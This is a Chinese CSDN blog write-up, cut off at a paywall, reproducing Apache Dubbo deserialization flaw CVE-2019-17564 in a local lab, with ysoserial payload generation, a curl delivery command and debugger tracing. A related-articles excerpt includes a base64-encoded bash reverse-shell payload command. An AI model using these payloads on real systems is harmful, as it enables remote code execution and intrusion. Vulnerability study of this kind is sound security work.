Apache Dubbo反序列化漏洞复现分析

最新推荐文章于 2024-07-31 15:26:25 发布
最新推荐文章于 2024-07-31 15:26:25 发布
阅读量3k 收藏 4
点赞数
分类专栏: 漏洞分析及复现 文章标签: apache rpc java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/include_voidmain/article/details/123374274
版权
本文详细分析了Apache Dubbo的两个经典反序列化漏洞CVE-2019-17564和CVE-2020-1948,包括影响版本、漏洞环境准备、漏洞分析、补丁分析及修复方法。通过示例展示了漏洞利用链和修复措施,强调了升级到最新版本以避免此类漏洞的重要性。
摘要由CSDN通过智能技术生成

前言

学习下Apache Dubbo系列的经典漏洞

CVE-2019-17564

0x01 影响版本

  • Dubbo 2.7.0 to 2.7.4

  • Dubbo 2.6.0 to 2.6.7

  • Dubbo all 2.5.x versions

0x02 环境准备

https://github.com/apache/dubbo-samples/tree/master/dubbo-samples-http下载源代码,在pom中切换dubbo版本,发现无法找到存在该漏洞的版本,手动下载jar包添加,并添加可利用依赖common-collections3.2

图片

0x03 漏洞分析

在dubbo开启http协议后通过http协议的请求都会经过

org.apache.dubbo.rpc.protocol.http.HttpProtocol.InternalHandler#handle方法,所以在此处打断点

利用ysoserial生成payload

java -jar ysoserial.jar CommonsCollections6 
"/System/Applications/Calculator.app/Contents/MacOS/Calculator">cc6

然后发送

curl http://127.0.0.1:8081/org.apache.dubbo.samples.http.api.DemoService --data-binary @cc6

会发现断在我们的断点处,向下跟踪

图片

170行会根据我们传入的路径寻找处理器,我们看看this.skeletonMap的值

图片

key对应着请求路径,value是一个HttpInvokerServiceExporter类的实例;接着在177行使用获取到的处理器处理请求,调用的是

org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter#handleRequest

图片

接着会将请求发送到

org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter#readRemoteInvocation(javax.servlet.http.HttpS

最低0.47元/天 解锁文章
长白山攻防实验室
关注
专栏目录
Aapche Dubbo 反序列化漏洞复现(CVE-2019-17564)
0xSec
12-24 849
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6370
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
php反序列化漏洞复现_PHP反序列化漏洞简介及相关技巧小结_入门渗透教程
最新发布
程序员三九的博客
07-31 413
要学习PHP反序列漏洞,先了解下PHP序列化和反序列化是什么东西。php程序为了保存和转储对象,提供了序列化的方法,php序列化是为了在程序运行的过程中对对象进行转储而产生的。
Apache Dubbo反序列化漏洞
蚁景网安学院
11-18 1502
Apache Dubbo反序列化漏洞复现及利用!
有关Apache dubbo反序列化漏洞复现及思考
码农小麦
06-07 1035
有关Apache dubbo反序列化漏洞(CVE-2019-17564)网上有许多漏洞复现文章,官方漏洞描述也说的很清楚,开启了http remoting协议时,存在反序列化漏洞。本身有关java漏洞反序列化占了很大一部分。大概流程就是应用程序在反序列化时执行了恶意代码导致RCE(remote command/code execute)。 先来看一个自定义对象反序列化引发RCE的示例: public class SerialDemo { public static void main(String[
Apache Dubbo 存在反序列化漏洞(CVE-2023-23638)
murphysec的博客
03-09 4451
Apache Dubbo 是一款轻量级 Java RPC 框架 该项目受影响版本存在反序列化漏洞,由于Dubbo在序列化时检查不够全面,当攻击者可访问到dubbo服务时,可通过构造恶意请求绕过检查触发反序列化,执行恶意代码
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 1341
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
Apache Dubbo 反序列化漏洞(CVE-2020-1948)
m0_46689007的博客
11-29 702
使用marshalsec开启ldap时,如果ldap服务和http服务上有日志,但时恶意命令没有执行,可以将"http://192.168.146.128#exp "改为"http://192.168.146.128/#exp"docker环境执行命令可能需要编码,如果ldap服务和http服务上有日志,但时恶意命令没有执行,将命令编码。看到ldap服务被访问,重定向到我们的http服务上的exp.class类。这一段是被攻击机访问攻击机的http服务上的恶意类exp.class。
Vulhub靶场Dubbo Java反序列化漏洞复现
X_python321的博客
08-03 264
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架
Java安全之Dubbo反序列化漏洞分析
m0_65462541的博客
12-21 2202
0x00 前言 最近天气冷,懒癌又犯了,加上各种项目使得本篇文断断续续。 0x01 Dubbo Dubbo是阿里巴巴开源的基于 Java 的高性能 RPC(一种远程调用) 分布式服务框架(SOA),致力于提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。dubbo 支持多种序列化方式并且序列化是和协议相对应的。比如:Dubbo支持dubbo、rmi、hessian、http、webservice、thrift、redis等多种协议。 运行机制 Dubbo框架启动,容器Contai
漏洞预警|Apache Dubbo 存在反序列化漏洞
LJQClqjc的博客
03-09 725
棱镜七彩安全预警
shrio反序列漏洞修复_提醒:Apache Dubbo存在反序列化漏洞
weixin_39583521的博客
12-01 152
背景:近日监测到Apache Dubbo存在反序列化漏洞(CVE-2019-17564),此漏洞可导致远程代码执行。Apache Dubbo是一款应用广泛的高性能轻量级的Java RPC分布式服务框架。鉴于漏洞危害较大,建议尽快更新软件。情报通告:威胁程度:个人风险评级:低危企业风险评级:中危情报风险预警:对公司影响等级为中,对使用Apache Dubbo相应版本的企业均有被攻击的风险。情报描述:...
Apache Dubbo 高危漏洞
zb_3Dmax的博客
09-06 804
具体是因为 Apache Dubbo hessian-lite 3.2.11 及之前的版本存在反序列化漏洞,而这个 hessina-lite 恰巧就是 Dubbo 默认的序列化方法。其实这个漏洞爆出来已经很多天了,影响面没 Log4j2 大,所以没那么“火”,不过也是个高危漏洞。今天又看到了个 Apache Dubbo 的高危漏洞通告,好家伙一看这版本,我们的应用有漏洞…所以用 Dubbo 的同学快去排查下自己的应用,看看是否受到影响。又是一个可以远程代码执行的漏洞漏洞的类型是因为反序列化的问题。
反序列化漏洞复现
qq_43679531的博客
01-21 3044
1.进入vulhub中使用docker-compose up -d命令启动jboss环境 2.访问http://192.168.1.31:8080,搭建成功 3.访问http://192.168.1.31:8080/invoker/readonly返回500,说明可能存在漏洞 4.使用命令java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.1.43:4444 生成ser
关于Apache Dubbo反序列化漏洞(CVE-2023-23638)的预警提示与对应的Zookeeper版本
u011236069的博客
06-27 1915
Apache官方发布安全公告,修复了Apache Dubbo中的一个反序列化漏洞(CVE-2023-23638)。由于Apache Dubbo安全检查存在缺陷,导致可以绕过反序列化安全检查并执行反序列化攻击,成功利用该漏洞可在目标系统上执行任意代码。Apache Dubbo 2.7.x 版本:
Apache Dubbo Hession反序列化漏洞(CVE-2022-39198)
huofuman960209的博客
11-07 2210
Apache Dubbo组件存在Hession反序列化漏洞,该漏洞是由于Dubbo hessian-lite 3.2.12及之前版本中存在反序列化漏洞,利用此漏洞可在目标系统上执行恶意代码,最终获取服务器最高权限,漏洞编号:CVE-2022-39198,漏洞威胁等级:高危。
反序列化漏洞漏洞复现
来日可期的博客
09-05 4030
反序列化漏洞是指应用程序在对已经序列化的数据进行反序列化时,由于缺少必要的验证或过滤,导致恶意数据被成功地反序列化为对象并被执行。攻击者可以构造恶意数据来利用这个漏洞,攻击方式通常是通过网络等传输渠道向目标应用程序发送序列化数据,使得应用程序在反序列化时执行了攻击者所构造的恶意代码,进而导致应用程序受到攻击。
漏洞预警|Apache Dubbo再现反序列化漏洞,腾讯安全已支持全方位检测防护
wzl_540的专栏
03-15 1288
(2)若直接编译、使用jar包构建项目,可查看jar包版本判断是否可能受漏洞影响(jar包全名:dubbo-x.x.x.jar / dubbo-common-x.x.x.jar,其中dubbo / dubbo-common为包名,x.x.x为版本)。(1)若使用maven构建项目,可在pom.xml等文件中查看引用的maven包版本(maven groupId: org.apache.dubbo,artifactId: dubbo / dubbo-common)。
fastjson反序列化漏洞复现过程
04-19
根据提供的引用内容,fastjson反序列化漏洞是一种安全漏洞,攻击者可以利用该漏洞在目标系统上执行恶意代码。下面是fastjson反序列化漏洞复现过程[^1][^2]: 1. 判断是否使用Fastjson以及Fastjson版本:首先需要确定目标系统是否使用了Fastjson,并且确定Fastjson的版本号。可以通过查看项目的依赖文件或者代码中的导入语句来确定。 2. 漏洞复现:根据Fastjson的版本号选择相应的漏洞复现方法。 - Fastjson<1.2.24远程代码执行(CNVD-2017-02833):该漏洞可以通过构造恶意的JSON字符串来触发远程代码执行。攻击者可以在JSON字符串中插入恶意的Java代码,并通过反序列化操作执行该代码。 - Fastjson<=1.2.47远程代码执行漏洞(CNVD-2019-22238):该漏洞可以通过构造恶意的JSON字符串来触发远程代码执行。攻击者可以在JSON字符串中使用特殊的反射调用方式来执行恶意代码。 3. 防范措施:为了防止fastjson反序列化漏洞的利用,可以采取以下措施: - 及时升级Fastjson版本:Fastjson团队会及时修复漏洞并发布新版本,及时升级到最新版本可以避免被已知漏洞攻击。 - 输入验证和过滤:在接收用户输入并进行反序列化操作之前,对输入进行严格的验证和过滤,确保输入的数据符合预期的格式和内容。 - 使用安全的JSON库:考虑使用其他安全性更高的JSON库,如Jackson或Gson,来替代Fastjson。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值